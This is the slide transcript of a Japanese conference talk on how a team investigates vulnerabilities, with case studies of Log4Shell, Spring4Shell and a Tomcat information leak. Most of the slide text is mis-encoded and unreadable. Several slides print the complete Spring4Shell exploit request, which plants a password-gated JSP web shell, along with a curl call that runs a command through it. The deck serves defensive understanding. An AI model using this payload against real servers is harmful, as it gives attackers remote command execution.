Upgrade to Pro — share decks privately, control downloads, hide ads and more …

How To 脆弱性対応

cm-komuro
November 21, 2022

How To 脆弱性対応

DevelopersIO Sapporo 2022 の登壇資料です

cm-komuro

November 21, 2022
Tweet

More Decks by cm-komuro

Other Decks in Programming

Transcript

  1. )PXUP੬ऑੑରԠ %FWFMPQFST*04BQQPSP

  2. ͜Ε͔Β࿩͢಺༰  ݸਓͷܦݧͰ͢

  3.  ͸͡Ίʹ

  4.  w੬ऑੑͷͳ͍γεςϜ͸ͳ͍ͱݴ͍͍ͬͯ wݕ஌ɺӨڹൣғௐࠪɺճආࡦɺ߃ٱରԠ wݕ஌͔Βઌ͸ਓ͕൑அ͢Δ w044ͳΒ͹ίʔυΛಡΊ͹େମ෼͔Δ wηΩϡϦςΟ͸શһͰҙࣝ͢Δ ͸͡Ίʹ

  5.  ࣗݾ঺հ

  6. ࣗݾ঺հ  /BNFখࣨɹܒʢ,0.630)*3",6ʣ 5FBNQSJTNBUJYࣄۀ෦'BOOBMZνʔϜ 3PMFϓϩδΣΫτϚωʔδϟ *OUFSFTUT+BWB 4QSJOH ੬ऑੑௐࠪ

  7. QSJTNBUJY 

  8.  ੬ऑੑ͸ͳͥϚζΠͷ͔

  9. ੬ऑੑ์ஔ͸ϚζΠ  wϚϧ΢ΣΞͷײછ΍όοΫυΞ wϢʔβʔ৘ใ౳ͷ$PO fi EFOUJBMͳ৘ใୣऔ wผͷ߈ܸର৅ͷ౿Έ୆ w߈ܸՄೳର৅ͱͯ͠ϚʔΫ wFUDʜ

  10.  Vulnerability

  11. ੬ऑੑ͸͍ΖΜͳϨΠϠʔʹ  wΠϯϑϥ w04 wϛυϧ΢ΣΞʢ࣮ߦ؀ڥʣ wΞϓϦέʔγϣϯίʔυ wଟछଟ༷ ͜ͷ͋ͨΓ͕λʔήοτͷ࿩

  12. νΣοΫͷํ๏͸खಈ͔Βࣗಈ·Ͱ༷ʑ  w$7& IUUQTXXXDWFPSH%PXOMPBET w+7/ IUUQTKWOKQ w4QSJOHܥͷ৔߹ɺ7.XBSFͷ੬ऑੑҰཡ IUUQTUBO[VWNXBSFDPNTFDVSJUZ w4OZL౳ͷηΩϡϦςΟαʔϏε w5XJUUFS

  13.  ௐ΂ͨ΋ͷͨͪ

  14. ੬ऑੑ$PNNJUΛಡΜͰߟ͑ͨΓͯ͠·͢  w-PHK੬ऑੑ໰୊ʹ͓͚Δ4QSJOH#PPUΞϓϦέʔγϣϯͷݕ ূ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTMPHKSDFTQSJOHCPPUSFTFBSDI wDWF4QSJOH4IFMMͷӨڹௐࠪ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTTQSJOHCPPUTQSJOHTIFMM w5PNDBUͷमਖ਼$PNNJUΛಡΜͰཧղ͢Δ$7& IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPS DWF

  15. ࢀর৘ใͱͯ͠ܝࡌ͞Εͨ  w1JZPMPH IUUQTQJZPMPHIBUFOBEJBSZKQFOUSZ w+7/ IUUQTKWOKQWV+7/76JOEFYIUNM

  16.  ͲͷΑ͏ʹಈ͍͍ͯΔ͔

  17. ରԠνʔϜ 

  18. ରԠνʔϜ  wେମ໊͘Β͍Ͱଈ੮νʔϜ࡞੒ wऔΓ·ͱΊ໊ w࠶ݱɺӨڹௐࠪ୲౰ʙ໊ wճආࡦɺݪҼڀ໌୲౰ʙ໊

  19. νʔϜͷಈ͖  ॳಈͰӨڹൣғͷେ͖͞ͱɺґଘͷ༗ແΛ֬ೝ Өڹ͕͋Γͦ͏ɻௐ͕ࠪඞཁͳ৔߹͸νʔϜ্ཱͪ͛ νʔϜ಺Ͱ໾ׂ෼୲ ฒߦ࡞ۀ ׂͱ͜·Ίʹ৘ใڞ༗

  20.  ࠶ݱνʔϜ

  21. ࠶ݱνʔϜ  w1P$ͷίʔυΛݩʹ߈ܸΛ࠶ݱ wطଘͷߏ੒ɺ৚݅Λຬͨ͢Α͏มߋͨ͠ߏ੒ɻେ͖͘ ύλʔϯͰνΣοΫ w؇࿨ࡦΛೖΕͯճආͰ͖Δ͔ΛνΣοΫɹ

  22.  ݪҼௐࠪνʔϜ

  23. ࠜຊݪҼͷ֬ೝ  wमਖ਼$PNNJU͔ΒಡΈղ͘ w෼ੳ͍ͯ͠ΔηΩϡϦςΟձࣾ΍ݸਓ͕ެ։͍ͯ͠Δ ϒϩά౳ΛಡΉʢ΄΅ӳޠ w࠶ݱͨ͠ߏ੒͔Βσόοά࣮ߦΛར༻ wϩάϨϕϧΛมߋͯ͠ಡΈղ͘

  24. ͕࣌ؒ͋ͬͨΒ΍Δ  ۩ମྫ

  25.  ۩ମྫ: Log4Shell

  26. -PH4IFMM  w$7& w೥຤ʹ૽͕Εͨ΍͹͍੬ऑੑ w੬ऑੑ͕͋Δର৅Ͱ͋Ε͹୭Ͱ΋࣮ߦՄೳ w-PHK Α͘஌ΒΕͨ-PHHFS࣮૷ ଞ࣮૷Ͱ୅දతͳͷ͕-PHCBDL

  27. զʑ͕ݕূͨ͠ಈ࡞ 

  28. -PH4IFMM  w$7&࠾൪ΑΓઌʹ1P$͕࿩୊ʹ wઐ໳తͳ஌͕ࣝগͳͯ͘΋߈ܸͰ͖ͯ͠·͏ w೚ҙͷΫϥεΛಈతʹ*OKFDUͯ͠͠·͏

  29.  ۩ମྫ: Spring4Shell

  30. 4QSJOH4IFMM  4QSJOHͷۭؾΛಡΜͰ୳͠ʹ͍͘ػߏΛѱ༻ -PH4IFMMΑΓ࣮ߦ͢ΔͨΊͷ৚͕݅ϋʔυ +BWBҎ͕߱ର৅ XBSλΠϓͰىಈ͞Ε͍ͯΔ

  31. +BWBҎ͕߱ର৅  wNPEVMF͸+BWBҎ߱ w+BWBҎલ͸NPEVMF͕ͳ͍ͷͰ1P$ͷ߈ܸํ๏ ͸੒ޭ͠ͳ͍ IUUQTXXXPSBDMFDPNDPSQPSBUFGFBUVSFTVOEFSTUBOEJOH KBWBNPEVMFTIUNM

  32. ىಈλΠϓͷҧ͍  wXBSλΠϓʹΑΔΞϓϦέʔγϣϯ͕ର৅ wCPPU+BS CPPU8BS౳ͷ୯ಠͰىಈՄೳͳ΋ͷ͸ର ৅֎

  33. ҎԼͷϦΫΤετΛղऍ͠Α͏ͱ͢Δ  wҎԼΛ#PEZʹؚΊͯ1045ͰϦΫΤετ w%BUB#JOEJOHͰ#JOEͰ͖ΔΫϥεΛ୳͢ class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2 %7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.get Parameter(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20wh ile((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))

    %3B%20%7D%20%7D%20%25%7Bsuffix%7Di &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &class.module.classLoader.resources.context.parent.pipeline.first.directory=webap ps/ROOT &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwa r &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
  34. ԿΛ͠Α͏ͱ͍ͯ͠Δ͔  w$MBTT-PBEFSΛḷͬͯ"DDFTT7BMWFʹΞΫηε w5PNDBUͷϩάग़ྗઃఆΛॻ͖׵͑Δ wϩάग़ྗύλʔϯʹ಺෦৘ใΛऔಘ͢ΔίʔυΛจࣈͱ ͯ͠ຒΊࠐΉ wϩάϑΝΠϧΛ+41ͱ֦ͯ͠ுࢠΛมߋ wϩάϑΝΠϧग़ྗઌΛ5PNDBUͷެ։σΟϨΫτϦʹม ߋ

  35. ࣮ߦ͞ΕΔͱԿ͕ى͖Δ͔  wϦΫΤετΛ࣮ߦ͢ΔͱϩάϑΝΠϧ͕+41ͱͳΔ wެ։͞ΕΔ %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di %{c2}i

    if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1} i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami' XIPBNJ͕ग़ྗ͞ΕΔ
  36. ىಈλΠϓ  ߈ܸख๏͕༗ޮͳ$MBTT-PBEFS 8FCBQQ$MBTT-PBEFS ߈ܸख๏͕ແޮͳ$MBTT-PBEFS -BVODIFE63-$MBTT-PBEFS ͯ͞ɻҧ͍͸ͳʹ͔ɻ

  37. ҧ͍͸HFU3FTPVSDFT .BZCF  8FCBQQ$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ HFU3FTPVSDFT ͕ఆٛ͞Ε͍ͯΔ IUUQTUPNDBUBQBDIFPSHUPNDBUEPDBQJPSHBQBDIF DBUBMJOBMPBEFS8FCBQQ$MBTT-PBEFS#BTFIUNMHFU3FTPVSDFT 

  38. ҧ͍͸HFU3FTPVSDFT .BZCF  -BVODIFE63-$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ HFU3FTPVSDFT ͷఆٛ͸ͳ͍ IUUQTEPDTPSBDMFDPNKBWBTFKQEPDTBQJKBWBCBTFKBWBMBOH $MBTT-PBEFSIUNMHFU3FTPVSDF KBWBMBOH4USJOH 

  39. #JOEJOHͰ$MBTT-PBEFS΁ΞΫηε  DMBTTNPEVMFDMBTT-PBEFS HFU$MBTT HFU.PEVMF HFU$MBTT-PBEFS class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20 if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream()

    %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di ͜ͷ$MBTT-PBEFS͕8FCBQQ$MBTT-PBEFSͩͱ Ҿ਺ͳ͠ͷHFU3FTPVSDFT ͕ଘࡏ͢Δ
  40. 5SBWFSTF$MBTT  8FCBQQ$MBTT-PBEFSHFU3FTPVSDFT  8FC3FTPVSDF3PPUHFU$POUFYU  $POUFYUHFU1BSFOU  $POUBJOFSHFU1JQFMJOF 

    1JQFMJOFHFU'JSTU  7BMWF "DDFTT7BMWF 
  41. ͲͷΑ͏ʹमਖ਼͞Ε͔ͨ  IUUQTHJUIVCDPNTQSJOHQSPKFDUTTQSJOHGSBNFXPSLQVMM fi MFT $MBTT-PBEFS΁ͷϓϩύςΟΞΫηε͸ແࢹ

  42.  ۩ମྫ: Tomcat ͷ৘ใ࿙͍͑

  43. 3FTQPOTF͕ࠞࡏ͢Δ  w+7/76"QBDIF5PNDBUʹ )UUQ1SPDFTTPSΠϯελϯεʹ͓͚Δڝ߹ঢ়ଶʹ ΑΔ৘ใ࿙͍͑ͷ੬ऑੑ IUUQTKWOKQWV+7/76JOEFYIUNM

  44. ࠶ݱ৚͕݅ݫ͍͠  w֎෦͔Β೚ҙͰ࣮ߦ͢Δͷ͸೉͍͠ wۮવൃੜ͢ΔՄೳੑ͸͋Δ wର৅͸ҎԼ "QBDIF5PNDBU.UP. "QBDIF5PNDBU.UP "QBDIF5PNDBU.UP "QBDIF5PNDBUUP

  45. मਖ਼$PNNJUΛಡΉ  IUUQTHJUIVCDPNBQBDIFUPNDBUDPNNJUCBEFGDDGEGD w0CKFDU "UPNJD3FGFSFODF0 CKFDU΁มߋ wUBLF$VSSFOU1SPDFTT PS ͕௥Ճ

  46. ͬ͘͟Γཧղ͢Δʢݸਓͷݟղ  wෳ਺ͷϓϩηε͔Βࢀর͞ΕΔ0CKFDU w͜ͷ0CKFDU͸4PDLFUʹ3FTQPOTFΛॻ͖ࠐΉ wHFUͨ͠ޙɺ͠Β͹͔ͯ͘͠ΒOVMMΛ୅ೖ͢Δॲཧ wۮવOVMMΛಥͬࠐΉલʹผϓϩηε͕0CKFDUʹΞΫηε ͢Δͱɺಉ͡ࢀর͕ฦΔ wෳ਺ͷ3FTQPOTFΛಉ͡0CKFDUʹॻ͖ࠐΉ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPSDWF

  47.  ·ͱΊ

  48. ·ͱΊ  w੬ऑੑ͸਎ۙʹ͋Γ·͢ ରԠ଴ͬͨͳ͠ wଞਓͷ࡞ͬͨίʔυΛ࢖Θͣʹ։ൃͰ͖Δ΋ͷ͸গͳ ͍ w։ൃऀ͸ར༻͍ͯ͠Δ044Λ΋ͬͱҙࣝ͠·ͤ͏ wηΩϡϦςΟ͸ΈΜͳͰߟ͑·ͤ͏

  49.  ͓ΘΓ